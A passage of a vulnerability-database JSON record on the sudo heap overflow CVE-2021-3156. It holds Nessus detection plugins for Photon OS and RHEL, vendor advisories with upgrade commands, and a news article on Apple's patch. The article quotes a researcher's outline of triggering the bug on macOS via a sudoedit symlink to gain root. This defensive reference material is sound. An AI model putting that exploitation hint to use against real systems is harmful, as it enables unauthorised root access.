script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:2.0\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 2.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-2.0', cpu:'x86_64', reference:'sudo-1.9.5-2.ph2')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T14:12:52", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0224 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 4, "cvss3": {"score": 
7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "RHEL 7 : sudo (RHSA-2021:0224)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "cpe": ["cpe:/o:redhat:rhel_e4s:7.4", "cpe:/o:redhat:rhel_tus:7.4::server", "cpe:/o:redhat:rhel_e4s:7.4::server", "cpe:/o:redhat:rhel_aus:7.4::server", "p-cpe:/a:redhat:enterprise_linux:sudo-devel", "cpe:/o:redhat:rhel_tus:7.4", "p-cpe:/a:redhat:enterprise_linux:sudo", "cpe:/o:redhat:rhel_aus:7.4"], "id": "REDHAT-RHSA-2021-0224.NASL", "href": "https://www.tenable.com/plugins/nessus/145495", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0224. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145495);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"RHSA\", value:\"2021:0224\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"RHEL 7 : sudo (RHSA-2021:0224)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2021:0224 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0224\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1917684\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sudo and / or sudo-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(122);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:7.4::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:7.4::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:7.4::server\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '7.4')) audit(AUDIT_OS_NOT, 'Red Hat 7.4', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_aus_7_4_server': [\n 'rhel-7-server-aus-debug-rpms',\n 'rhel-7-server-aus-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-aus-optional-debug-rpms',\n 'rhel-7-server-aus-optional-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-aus-optional-rpms',\n 'rhel-7-server-aus-optional-rpms__7_DOT_4__x86_64',\n 
'rhel-7-server-aus-optional-source-rpms',\n 'rhel-7-server-aus-optional-source-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-aus-rpms',\n 'rhel-7-server-aus-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-aus-source-rpms',\n 'rhel-7-server-aus-source-rpms__7_DOT_4__x86_64'\n ],\n 'rhel_e4s_7_4_server': [\n 'rhel-7-server-aus-debug-rpms',\n 'rhel-7-server-aus-optional-debug-rpms',\n 'rhel-7-server-aus-optional-rpms',\n 'rhel-7-server-aus-optional-source-rpms',\n 'rhel-7-server-aus-rpms',\n 'rhel-7-server-aus-source-rpms',\n 'rhel-7-server-e4s-debug-rpms',\n 'rhel-7-server-e4s-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-e4s-optional-debug-rpms',\n 'rhel-7-server-e4s-optional-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-e4s-optional-rpms',\n 'rhel-7-server-e4s-optional-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-e4s-optional-source-rpms',\n 'rhel-7-server-e4s-optional-source-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-e4s-rpms',\n 'rhel-7-server-e4s-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-e4s-source-rpms',\n 'rhel-7-server-e4s-source-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-debug-rpms',\n 'rhel-7-server-tus-optional-debug-rpms',\n 'rhel-7-server-tus-optional-rpms',\n 'rhel-7-server-tus-optional-source-rpms',\n 'rhel-7-server-tus-rpms',\n 'rhel-7-server-tus-source-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-debug-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-debug-rpms__7_DOT_4__x86_64',\n 'rhel-ha-for-rhel-7-server-e4s-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-rpms__7_DOT_4__x86_64',\n 'rhel-ha-for-rhel-7-server-e4s-source-rpms',\n 'rhel-ha-for-rhel-7-server-e4s-source-rpms__7_DOT_4__x86_64'\n ],\n 'rhel_tus_7_4_server': [\n 'rhel-7-server-tus-debug-rpms',\n 'rhel-7-server-tus-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-optional-debug-rpms',\n 'rhel-7-server-tus-optional-debug-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-optional-rpms',\n 'rhel-7-server-tus-optional-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-optional-source-rpms',\n 
'rhel-7-server-tus-optional-source-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-rpms',\n 'rhel-7-server-tus-rpms__7_DOT_4__x86_64',\n 'rhel-7-server-tus-source-rpms',\n 'rhel-7-server-tus-source-rpms__7_DOT_4__x86_64'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0224');\n}\n\npkgs = [\n {'reference':'sudo-1.8.19p2-12.el7_4.2', 'sp':'4', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_7_4_server', 'rhel_e4s_7_4_server', 'rhel_tus_7_4_server']},\n {'reference':'sudo-devel-1.8.19p2-12.el7_4.2', 'sp':'4', 'cpu':'i686', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_7_4_server', 'rhel_e4s_7_4_server', 'rhel_tus_7_4_server']},\n {'reference':'sudo-devel-1.8.19p2-12.el7_4.2', 'sp':'4', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_7_4_server', 'rhel_e4s_7_4_server', 'rhel_tus_7_4_server']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = 
package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo / sudo-devel');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2021-02-10T23:29:23", "bulletinFamily": "software", "cvelist": ["CVE-2021-23239", "CVE-2021-3156"], "description": "## Severity\n\nHigh\n\n## Vendor\n\nCanonical Ubuntu\n\n## Versions Affected\n\n * Canonical Ubuntu 16.04\n * Canonical Ubuntu 18.04\n\n## Description\n\nIt was discovered that Sudo incorrectly handled memory when parsing command lines. A local attacker could possibly use this issue to obtain unintended access to the administrator account. (CVE-2021-3156)\n\nIt was discovered that the Sudo sudoedit utility incorrectly handled checking directory permissions. A local attacker could possibly use this issue to bypass file permissions and determine if a directory exists or not. 
(CVE-2021-23239)\n\nCVEs contained in this USN include: CVE-2021-3156, CVE-2021-23239.\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is high unless otherwise noted._\n\n * cflinuxfs3 \n * All versions prior to 0.222.0\n * Xenial Stemcells \n * 456.x versions prior to 456.135\n * 621.x versions prior to 621.99\n * All other stemcells not listed.\n * CF Deployment \n * All versions prior to 16.0.0\n\n## Mitigation\n\nUsers of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading the following releases:\n\n * cflinuxfs3 \n * Upgrade All versions to 0.222.0 or greater\n * Xenial Stemcells \n * Upgrade 456.x versions to 456.135 or greater\n * Upgrade 621.x versions to 621.99 or greater\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells>).\n * CF Deployment \n * Upgrade All versions to 16.0.0 or greater\n\n## References\n\n * [USN Notice](<https://usn.ubuntu.com/4705-1/>)\n * [CVE-2021-3156](<https://people.canonical.com/~ubuntu-security/cve/CVE-2021-3156>)\n * [CVE-2021-23239](<https://people.canonical.com/~ubuntu-security/cve/CVE-2021-23239>)\n\n## History\n\n2021-02-10: Initial vulnerability report published.\n", "edition": 1, "modified": "2021-02-10T00:00:00", "published": "2021-02-10T00:00:00", "id": "CFOUNDRY:E2EC45D69AA3550DE981BAC4E63015D3", "href": "https://www.cloudfoundry.org/blog/usn-4705-1/", "title": "USN-4705-1: Sudo vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2021-02-04T12:26:48", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23239", "CVE-2021-3156"], "description": "Arch Linux Security Advisory ASA-202101-25\n==========================================\n\nSeverity: Critical\nDate : 2021-01-20\nCVE-ID : CVE-2021-3156 CVE-2021-23239\nPackage : sudo\nType : multiple issues\nRemote : No\nLink : 
https://security.archlinux.org/AVG-1431\n\nSummary\n=======\n\nThe package sudo before version 1.9.5.p2-1 is vulnerable to multiple\nissues including privilege escalation and information disclosure.\n\nResolution\n==========\n\nUpgrade to 1.9.5.p2-1.\n\n# pacman -Syu \"sudo>=1.9.5.p2-1\"\n\nThe problems have been fixed upstream in version 1.9.5.p2.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2021-3156 (privilege escalation)\n\nA serious heap-based buffer overflow has been discovered in sudo before\nversion 1.9.5p2 that is exploitable by any local user. It has been\ngiven the name Baron Samedit by its discoverer. The bug can be\nleveraged to elevate privileges to root, even if the user is not listed\nin the sudoers file. User authentication is not required to exploit the\nbug.\n\n- CVE-2021-23239 (information disclosure)\n\nA security issue was found in sudo before version 1.9.5. A race\ncondition in sudoedit could have allowed an attacker to test for the\nexistence of directories in arbitrary locations in the file system.\n\nImpact\n======\n\nAny unprivileged user can escalate privileges, and a local attacker\ncould figure out file locations through a race condition.\n\nReferences\n==========\n\nhttps://www.openwall.com/lists/oss-security/2021/01/11/2\nhttps://www.sudo.ws/alerts/unescape_overflow.html\nhttps://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit\nhttps://www.openwall.com/lists/oss-security/2021/01/26/3\nhttps://www.sudo.ws/repos/sudo/rev/9b97f1787804\nhttps://www.sudo.ws/repos/sudo/rev/a97dc92eae6b\nhttps://www.sudo.ws/repos/sudo/rev/049ad90590be\nhttps://www.sudo.ws/repos/sudo/rev/09f98816fc89\nhttps://www.sudo.ws/repos/sudo/rev/c125fbe68783\nhttps://www.sudo.ws/repos/sudo/rev/ea19d0073c02\nhttps://security.archlinux.org/CVE-2021-3156\nhttps://security.archlinux.org/CVE-2021-23239", "modified": "2021-01-20T00:00:00", "published": "2021-01-20T00:00:00", "id": 
"ASA-202101-25", "href": "https://security.archlinux.org/ASA-202101-25", "type": "archlinux", "title": "[ASA-202101-25] sudo: multiple issues", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "apple": [{"lastseen": "2021-02-10T04:43:56", "bulletinFamily": "software", "cvelist": ["CVE-2021-1806", "CVE-2021-3156", "CVE-2021-1805"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## macOS Big Sur 11.2.1, macOS Catalina 10.15.7 Supplemental Update*, macOS Mojave 10.14.6 Security Update 2021-002\n\nReleased February 9, 2021\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Big Sur 11.2, macOS Catalina 10.15.7\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1805: ABC Research s.r.o. working with Trend Micro Zero Day Initiative\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Big Sur 11.2, macOS Catalina 10.15.7\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2021-1806: ABC Research s.r.o. 
working with Trend Micro Zero Day Initiative\n\n**Sudo**\n\nAvailable for: macOS Big Sur 11.2, macOS Catalina 10.15.7, macOS Mojave 10.14.6\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: This issue was addressed by updating to sudo version 1.9.5p2.\n\nCVE-2021-3156: Qualys\n\n\n\n* After installing this update, the build number for macOS Catalina 10.15.7 is 19H524.\n", "edition": 1, "modified": "2021-02-09T06:28:25", "published": "2021-02-09T06:28:25", "id": "APPLE:HT212177", "href": "https://support.apple.com/kb/HT212177", "title": "About the security content of macOS Big Sur 11.2.1, macOS Catalina 10.15.7 Supplemental Update, and macOS Mojave 10.14.6 Security Update 2021-002 - Apple Support", "type": "apple", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2021-02-10T13:03:31", "bulletinFamily": "info", "cvelist": ["CVE-2021-1805", "CVE-2021-1806", "CVE-2021-3156"], "description": "[](<https://thehackernews.com/images/-aWsoAGGR3bg/YCOy9lQs-iI/AAAAAAAABuM/vNAeBWmdBzoyPSLOrMMWnCCOy-WGxwBBwCLcBGAsYHQ/s0/macos-hacking.jpg>)\n\nApple has rolled out a fix for a critical sudo vulnerability in macOS Big Sur, Catalina, and Mojave that could allow unauthenticated local users to gain root-level privileges on the system.\n\n\"A local attacker may be able to elevate their privileges,\" Apple [said](<https://support.apple.com/en-us/HT212177>) in a security advisory. 
\"This issue was addressed by updating to sudo version 1.9.5p2.\"\n\nSudo is a common utility built into most Unix and Linux operating systems that lets a user without security privileges access and run a program with the credentials of another user.\n\nTracked as **CVE-2021-3156** (also called \"**Baron Samedit**\"), the vulnerability first came to light last month after security auditing firm Qualys [disclosed](<https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit>) the existence of a heap-based buffer overflow, which it said had been \"hiding in plain sight\" for almost 10 years.\n\n[](<https://go.thn.li/password-auditor> \"password auditor\" )\n\nThe vulnerability, which was introduced in the code back in July 2011, impacts sudo versions 1.7.7 through 1.7.10p9, 1.8.2 through 1.8.31p2, and 1.9.0 through 1.9.5p1, following which the maintainers released [1.8.32 and 1.9.5p2](<https://www.sudo.ws/alerts/unescape_overflow.html>) to resolve the issue.\n\nWhile the weakness can only be exploited by an attacker already having access to a vulnerable host, the barrier could be easily bypassed by planting malware on a device or brute-forcing a low-privileged service account.\n\nIn its report, Qualys researchers said they managed to develop multiple variants of exploit and obtain full root privileges on Ubuntu 20.04 (Sudo 1.8.31), Debian 10 (Sudo 1.8.27), and Fedora 33 (Sudo 1.9.2).\n\nBut last week, British security researcher Matthew Hickey discovered that the vulnerability also extended to the [latest version](<https://support.apple.com/en-us/HT212147>) of macOS Big Sur 11.2, prompting Apple to address the security shortcoming.\n\n\"CVE-2021-3156 also impacts @apple MacOS Big Sur (unpatched at present), you can enable exploitation of the issue by symlinking sudo to sudoedit and then triggering the heap overflow to escalate one's privileges to 1337 uid=0,\" Hickey 
[tweeted](<https://twitter.com/hackerfantastic/status/1356645638151303169>) on February 2.\n\nBesides the fix for the sudo vulnerability, Tuesday's supplemental security update also includes patches for two flaws in Intel Graphics Driver (CVE-2021-1805 and CVE-2021-1806), which could cause an application to execute arbitrary code with kernel privileges.\n\nThe vulnerabilities, which stem from an out-of-bounds write and a race condition, respectively, were rectified with additional validation, the iPhone maker said.\n\nMac users who haven't opted to check for updates automatically can head to Apple menu > System Preferences, and then click Software Update to [download and install](<https://support.apple.com/en-in/guide/mac-help/mchlpx1065/mac>) the latest updates.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "modified": "2021-02-10T12:57:48", "published": "2021-02-10T10:23:00", "id": "THN:AF0CBD71A7E1DCE8E508D374E0760687", "href": "https://thehackernews.com/2021/02/apple-patches-10-year-old-macos-sudo.html", "type": "thn", "title": "Apple Patches 10-Year-Old macOS SUDO Root Privilege Escalation Bug", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2021-01-27T03:33:58", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23239", "CVE-2020-23240", "CVE-2021-3156", "CVE-2021-23240"], "description": "### Background\n\nsudo (su \u201cdo\u201d) allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments. \n\n### Description\n\nMultiple vulnerabilities have been discovered in sudo. 
Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nLocal users are able to gain unauthorized privileges on the system or determine the existence of files. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll sudo users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-admin/sudo-1.9.5_p2\"", "edition": 1, "modified": "2021-01-26T00:00:00", "published": "2021-01-26T00:00:00", "id": "GLSA-202101-33", "href": "https://security.gentoo.org/glsa/202101-33", "title": "sudo: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}]}